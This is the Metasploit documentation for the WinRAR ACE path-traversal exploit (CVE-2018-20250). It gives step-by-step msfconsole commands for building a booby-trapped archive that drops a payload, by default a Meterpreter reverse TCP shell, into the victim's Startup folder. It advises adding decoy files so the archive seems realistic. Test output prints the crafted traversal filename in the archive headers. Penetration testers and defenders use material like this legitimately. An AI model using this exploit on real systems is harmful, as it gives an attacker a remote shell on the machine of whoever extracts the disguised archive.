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GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/fileformat/
Views: 1904


From the CVE-2018-20250 NVD Page: In WinRAR versions prior to and including 5.61, there is a path traversal vulnerability when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored, thus treating the filename as an absolute path.

This module will attempt to extract a payload to the startup folder of the current user. It is limited such that we can only go back one folder. Therefore, for this exploit to work properly, the user must extract the supplied RAR file from one folder within the user profile folder (e.g. Desktop or Downloads). User restart is required to gain a shell.

Vulnerable Application

  • RARLAB WinRAR <= 5.61

Verification Steps

  1. Start msfconsole

  2. Do: use exploit/windows/fileformat/winrar_ace

  3. Do: set FILENAME [FILENAME]. Name is msf.ace by default.

  4. Optional: Do: set CUSTFILE [CUSTFILE] to use a custom payload.

  5. Optional: Do: set PAYLOAD [PAYLOAD]. windows/meterpreter/reverse_tcp by default. Skip if using a custom payload.

  6. Configure your payload if using a Metasploit-provided payload. Skip if using a custom payload.

  7. Optional: Do: set FILE_LIST [FILE_LIST] to provide a list of other files to add to the ACE archive.

  8. Do: exploit

  9. Verify that a file is created (by default in ~/.msf4/local/) and that it passes ****'s checks


FILENAME Filename to output. Default is msf.ace. Other extensions like rar and zip can be used as WinRAR parses files by their headers and not by extension.

CUSTFILE Optional. Custom payload to use. Can be anything. Just be aware that some files are not meant to be executed in case you're wondering why the shellz ain't poppin'.

FILE_LIST Optional. A list of other files to be included in the resulting ACE archive. The specified file must contain full paths to other files. Compression is NOT taking place. This can be used to make the output file seem more realistic.


  • Tested on a Windows Server 2019 Datacenter x64, fully patched, with WinRAR 5.61

Test with autogenerated payload, no additional files in archive

Output from Metasploit:

msf5 exploit(windows/fileformat/winrar_ace) > set LHOST LHOST => msf5 exploit(windows/fileformat/winrar_ace) > exploit [*] Payload filename: sGrBPr.exe [+] msf.ace stored at /home/msfdev2/.msf4/local/msf.ace msf5 exploit(windows/fileformat/winrar_ace) >

Verify checksums using acefile:

msfdev2@automata:~$ python3 --headers .msf4/local/msf.ace volume filename .msf4/local/msf.ace filesize 73972 headers MAIN:1 FILE:1 others:0 header hdr_crc 0x286b hdr_size 49 hdr_type 0x00 MAIN hdr_flags 0x9000 ADVERT|SOLID magic b'**ACE**' eversion 20 2.0 cversion 20 2.0 host 0x02 Win32 volume 0 datetime 0x4e561810 2019-02-22 03:00:32 reserved1 97 4f f6 aa 00 00 00 00 advert b'*UNREGISTERED VERSION*' comment b'' reserved2 b'' header hdr_crc 0x0131 hdr_size 113 hdr_type 0x01 FILE32 hdr_flags 0x8001 ADDSIZE|SOLID packsize 73802 origsize 73802 datetime 0x4e55b063 2019-02-21 22:03:06 attribs 0x00000020 ARCHIVE crc32 0xab7ba1d3 comptype 0x00 stored compqual 0x03 normal params 0x000a reserved1 0x4554 filename b'C:\\C:C:../AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\sGrBPr.exe' comment b'' ntsecurity b'' reserved2 b'' msfdev2@automata:~$

Test with custom payload, no additional files in archive

Custom payload to be used:

msfdev2@automata:~$ ls -la | grep abcdef.exe -rw-r--r-- 1 msfdev2 msfdev2 73802 Apr 16 22:11 abcdef.exe msfdev2@automata:~$

Output from Metasploit:

msf5 exploit(windows/fileformat/winrar_ace) > set CUSTFILE /home/msfdev2/abcdef.exe CUSTFILE => /home/msfdev2/abcdef.exe msf5 exploit(windows/fileformat/winrar_ace) > set FILENAME msf2.ace FILENAME => msf2.ace msf5 exploit(windows/fileformat/winrar_ace) > set LHOST LHOST => msf5 exploit(windows/fileformat/winrar_ace) > exploit [*] Using a custom payload: abcdef.exe [*] Payload filename: abcdef.exe [+] msf2.ace stored at /home/msfdev2/.msf4/local/msf2.ace msf5 exploit(windows/fileformat/winrar_ace) >

Verify checksums using acefile:

msfdev2@automata:~$ python3 --headers .msf4/local/msf2.ace volume filename .msf4/local/msf2.ace filesize 73972 headers MAIN:1 FILE:1 others:0 header hdr_crc 0x286b hdr_size 49 hdr_type 0x00 MAIN hdr_flags 0x9000 ADVERT|SOLID magic b'**ACE**' eversion 20 2.0 cversion 20 2.0 host 0x02 Win32 volume 0 datetime 0x4e561810 2019-02-22 03:00:32 reserved1 97 4f f6 aa 00 00 00 00 advert b'*UNREGISTERED VERSION*' comment b'' reserved2 b'' header hdr_crc 0x14c6 hdr_size 113 hdr_type 0x01 FILE32 hdr_flags 0x8001 ADDSIZE|SOLID packsize 73802 origsize 73802 datetime 0x4e55b063 2019-02-21 22:03:06 attribs 0x00000020 ARCHIVE crc32 0x6735f66e comptype 0x00 stored compqual 0x03 normal params 0x000a reserved1 0x4554 filename b'C:\\C:C:../AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\abcdef.exe' comment b'' ntsecurity b'' reserved2 b'' msfdev2@automata:~$

Test with custom payload, 2 additional files in archive

Contents of FILE_LIST:

msfdev2@automata:~$ cat ace_files.txt /home/msfdev2/hello.txt /home/msfdev2/world.txt msfdev2@automata:~$

Contents of each file in the list:

msfdev2@automata:~$ cat hello.txt hello msfdev2@automata:~$ cat world.txt world msfdev2@automata:~$

Custom payload to be used:

msfdev2@automata:~$ ls -la | grep abcdef.exe -rw-r--r-- 1 msfdev2 msfdev2 73802 Apr 16 22:11 abcdef.exe msfdev2@automata:~$

Output from Metasploit:

msf5 exploit(windows/fileformat/winrar_ace) > set CUSTFILE /home/msfdev2/abcdef.exe CUSTFILE => abcdef.exe msf5 exploit(windows/fileformat/winrar_ace) > set FILE_LIST /home/msfdev2/ace_files.txt FILE_LIST => ace_files.txt msf5 exploit(windows/fileformat/winrar_ace) > set FILENAME custom.ace FILENAME => custom.ace msf5 exploit(windows/fileformat/winrar_ace) > set LHOST LHOST => msf5 exploit(windows/fileformat/winrar_ace) > exploit [*] Using the provided list of files @ /home/msfdev2/ace_files.txt... [*] Using a custom payload: abcdef.exe [*] Payload filename: abcdef.exe [+] custom.ace stored at /home/msfdev2/.msf4/local/custom.ace msf5 exploit(windows/fileformat/winrar_ace) >

Verify checksums using acefile:

msfdev2@automata:~$ python3 --headers .msf4/local/custom.ace volume filename .msf4/local/custom.ace filesize 74072 headers MAIN:1 FILE:3 others:0 header hdr_crc 0x286b hdr_size 49 hdr_type 0x00 MAIN hdr_flags 0x9000 ADVERT|SOLID magic b'**ACE**' eversion 20 2.0 cversion 20 2.0 host 0x02 Win32 volume 0 datetime 0x4e561810 2019-02-22 03:00:32 reserved1 97 4f f6 aa 00 00 00 00 advert b'*UNREGISTERED VERSION*' comment b'' reserved2 b'' header hdr_crc 0x8965 hdr_size 40 hdr_type 0x01 FILE32 hdr_flags 0x8001 ADDSIZE|SOLID packsize 6 origsize 6 datetime 0x4e55b063 2019-02-21 22:03:06 attribs 0x00000020 ARCHIVE crc32 0xc9c5cfdf comptype 0x00 stored compqual 0x03 normal params 0x000a reserved1 0x4554 filename b'hello.txt' comment b'' ntsecurity b'' reserved2 b'' header hdr_crc 0x3161 hdr_size 40 hdr_type 0x01 FILE32 hdr_flags 0x8001 ADDSIZE|SOLID packsize 6 origsize 6 datetime 0x4e55b063 2019-02-21 22:03:06 attribs 0x00000020 ARCHIVE crc32 0x22c79e57 comptype 0x00 stored compqual 0x03 normal params 0x000a reserved1 0x4554 filename b'world.txt' comment b'' ntsecurity b'' reserved2 b'' header hdr_crc 0x14c6 hdr_size 113 hdr_type 0x01 FILE32 hdr_flags 0x8001 ADDSIZE|SOLID packsize 73802 origsize 73802 datetime 0x4e55b063 2019-02-21 22:03:06 attribs 0x00000020 ARCHIVE crc32 0x6735f66e comptype 0x00 stored compqual 0x03 normal params 0x000a reserved1 0x4554 filename b'C:\\C:C:../AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\abcdef.exe' comment b'' ntsecurity b'' reserved2 b'' msfdev2@automata:~$